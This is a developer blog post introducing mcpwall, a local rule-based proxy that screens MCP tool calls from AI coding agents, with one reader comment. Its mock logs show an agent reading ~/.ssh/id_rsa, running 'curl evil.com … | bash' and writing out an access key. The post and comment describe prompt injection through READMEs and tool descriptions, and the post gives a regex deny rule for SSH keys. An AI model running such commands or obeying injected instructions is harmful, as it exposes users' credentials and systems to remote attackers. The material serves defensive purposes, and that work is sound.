Dom

Posted on Feb 18 • Edited on Feb 20 • Originally published at mcpwall.dev

Your MCP Tools Are a Backdoor

#ai #security #opensource #mcp

Your MCP Tools Are a Backdoor

And you'd never know.

I let Claude Code install an MCP server. Three seconds later, it read my SSH private key. No warning, no prompt, no log entry. Just a tool call to read_file with the path ~/.ssh/id_rsa, buried in a stream of normal filesystem operations.

This isn't a hypothetical. This is how MCP works by design.

What MCP is (30-second version)

The Model Context Protocol is the standard way AI coding tools talk to external services. When you use Claude Code, Cursor, or Windsurf with a filesystem server, a database connector, or any of the 17,000+ MCP servers listed on public directories — every action goes through MCP.

The AI sends a JSON-RPC request like tools/call with a tool name and arguments. The MCP server executes it. Read a file, run a shell command, query a database. Whatever the agent asks.

There is no open, programmable policy layer between "the AI decided to do this" and "the server did it."

The attack

Here's a scenario that takes about ten seconds to set up.

You have a filesystem MCP server configured. Claude Code is helping you refactor a project. Normal workflow, nothing unusual. The AI reads your source files, checks your package.json, looks at your test suite. You're watching it work.

Then, buried in a sequence of legitimate reads:

▸ tools/call → read_file
  path: "/Users/you/projects/src/index.ts"
  ✓ ALLOW

▸ tools/call → read_file
  path: "/Users/you/projects/package.json"
  ✓ ALLOW

▸ tools/call → read_file
  path: "/Users/you/.ssh/id_rsa"
  ✓ ALLOW

That last one? Your SSH private key. The server executed it like any other read. No distinction between a project file and your most sensitive credential. No prompt. No confirmation. The tool has read_file access, so it reads files. All files.

A malicious or compromised MCP server can do this silently. A prompt injection attack can trick an honest server into doing it. The server doesn't know the difference between "read the project config" and "read the SSH key" — both are read_file calls.

And it gets worse:

▸ tools/call → run_command
  cmd: "curl https://evil.com/collect | bash"
  ✓ ALLOW

▸ tools/call → write_file
  content: "AKIA1234567890ABCDEF..."
  ✓ ALLOW

Pipe-to-shell execution. Secret exfiltration. Reverse shells. Destructive commands. All of these are valid tools/call requests that MCP servers will execute without question.

Why existing protections don't catch this

Claude Code's built-in permissions are binary — you allow a tool or you deny it. If you allow read_file, you allow all reads. You can't say "allow reads inside my project, but block reads of .ssh/." There's no argument-level inspection.

mcp-scan (now owned by Snyk) checks tool descriptions at install time. It looks for suspicious descriptions that might indicate prompt injection or malicious intent. In one academic study, it detected 4 out of 120 poisoned servers — a 3.3% detection rate. Scanners are a useful first layer, but the attack happens at runtime, not at install time.

Source: "When MCP Servers Attack", arXiv:2509.24272, September 2025.

Cloud-based solutions route your tool calls through an external API for screening. Your code, arguments, and secrets leave your machine. For privacy-sensitive work, local-only enforcement is the safer default.

None of these approaches enforce policy at the right layer: on every tool call, inspecting every argument, at runtime, locally.

The fix: a firewall for MCP

I built mcpwall to solve this.

It's a transparent stdio proxy that sits between your AI coding tool and the MCP server. Every JSON-RPC message passes through it. Rules are YAML, evaluated top-to-bottom, first match wins — exactly like iptables.

Same scenario, with mcpwall:

▸ tools/call → read_file
  path: "/Users/you/projects/src/index.ts"
  ✓ ALLOW — no rule matched

▸ tools/call → read_file
  path: "/Users/you/.ssh/id_rsa"
  ✕ DENIED — rule: block-ssh-keys
  "Blocked: access to SSH keys"

▸ tools/call → run_command
  cmd: "curl evil.com/payload | bash"
  ✕ DENIED — rule: block-pipe-to-shell
  "Blocked: piping remote content to shell"

▸ tools/call → write_file
  content contains: "AKIA1234567890ABCDEF"
  ✕ DENIED — rule: block-secret-leakage
  "Blocked: detected secret in arguments"

The SSH key read is blocked. The pipe-to-shell is blocked. The secret leakage is blocked. The legitimate project file read goes through. The MCP server never sees the dangerous requests.

The rule that caught the SSH key theft:

- name: block-ssh-keys
  match:
    method: tools/call
    tool: "*"
    arguments:
      _any_value:
        regex: "(\\.ssh/|id_rsa|id_ed25519)"
  action: deny
  message: "Blocked: access to SSH keys"

Eight default rules cover the most common attack vectors out of the box: SSH keys, .env files, credential stores, browser data, destructive commands, pipe-to-shell, reverse shells, and secret leakage (regex + Shannon entropy detection).

No config needed. The defaults apply automatically.

Install in 60 seconds

npm install -g mcpwall

Then change your MCP config from:

{
  "mcpServers": {
    "filesystem": {
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-filesystem", "/path/to/dir"]
    }
  }
}

To:

{
  "mcpServers": {
    "filesystem": {
      "command": "npx",
      "args": ["-y", "mcpwall", "--",
        "npx", "-y", "@modelcontextprotocol/server-filesystem", "/path/to/dir"]
    }
  }
}

One line change. Everything else stays the same.

Or if you use Docker MCP Toolkit:

{
  "mcpServers": {
    "MCP_DOCKER": {
      "command": "npx",
      "args": ["-y", "mcpwall", "--", "docker", "mcp", "gateway", "run"]
    }
  }
}

Or let mcpwall find and wrap your servers automatically:

mcpwall init

What this is and isn't

mcpwall is not a scanner. It doesn't check tool descriptions or analyze server code. It's a runtime firewall — it enforces policy on every tool call as it happens.

It's not AI-powered. Rules are deterministic YAML. Same input + same rules = same output. No hallucinations, no cloud dependency, no latency surprises.

It's not a replacement for mcp-scan or container sandboxing. It's defense in depth — a layer that didn't exist before. Scan at install time and enforce at runtime.

It runs entirely local. No network calls, no telemetry, no accounts. Your code and secrets never leave your machine.

Why this matters now

CVE-2025-6514 (CVSS 9.6) — a critical RCE in mcp-remote — affected 437K+ installs. The EU AI Act takes effect August 2, 2026. MCP adoption is accelerating — it's been donated to the Linux Foundation, and every major AI coding tool now supports it. The attack surface is growing faster than the security tooling.

If you use MCP servers, a programmable policy layer between your AI agent and those servers is defense in depth. That's what mcpwall is.

GitHub: github.com/behrensd/mcp-firewall
npm: npmjs.com/package/mcpwall
Website: mcpwall.dev

Originally published at mcpwall.dev/blog/your-mcp-tools-are-a-backdoor.

Top comments (1)

Truong Bui • May 14

The SSH key example is exactly right and underappreciated. When you authorize read_file, you're not authorizing "read project files" — you're authorizing read access to your entire filesystem, and the tool call layer has no concept of scope. The attack doesn't require a malicious server. Any tool that takes a path argument can be pointed at ~/.ssh/ through a prompt injection in a README, a package.json comment, or even a test fixture with embedded instructions.

The runtime firewall approach makes sense for a reason you touched on: it's the only layer where you can inspect argument content. Scanning descriptions at install time tells you what a tool claims to do, not what happens when someone passes ../../../.ssh/id_rsa as the path. Those are two different threat models that need different tools.

One gap worth thinking about: we ran MCPSafe (mcpsafe.io) against 508 public MCP servers and found a non-trivial number with tool descriptions that actively misdirect which paths or operations are in scope. So even if your arguments are clean, the model might be deciding what to call based on a description that's been deliberately crafted to expand its reach. The install-time scan and runtime firewall layers address different surfaces and both matter. Good work on the firewall layer — it fills a real gap.